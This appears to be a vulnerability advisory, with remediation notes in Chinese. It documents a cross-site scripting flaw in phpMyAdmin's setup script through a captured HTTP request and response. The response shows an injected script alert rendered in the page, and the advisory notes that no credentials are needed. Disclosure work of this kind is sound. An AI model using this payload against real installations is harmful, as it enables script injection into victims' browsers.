Request
-------
GET /phpmyadmin/setup/index.php HTTP/1.1
Host: 192.168.23.128
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: ?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server
Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en
Response
--------
HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 16:44:18 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.2
Expires: Thu, 01 Dec 2011 16:44:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 01 Dec 2011 16:44:18 GMT
X-Frame-Options: SAMEORIGIN
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self'
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7852
Content-Type: text/html; charset=utf-8
---snip---
<div><h4>Use SSL (<script>alert('XSS');</script>)</h4>You should use SSL connections if your web server supports it.</div>
Please note that valid database credentials are not required to exploit
this vulnerability.
建议:
--------------------------------------------------------------------------------
厂商补丁:
phpMyAdmin
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: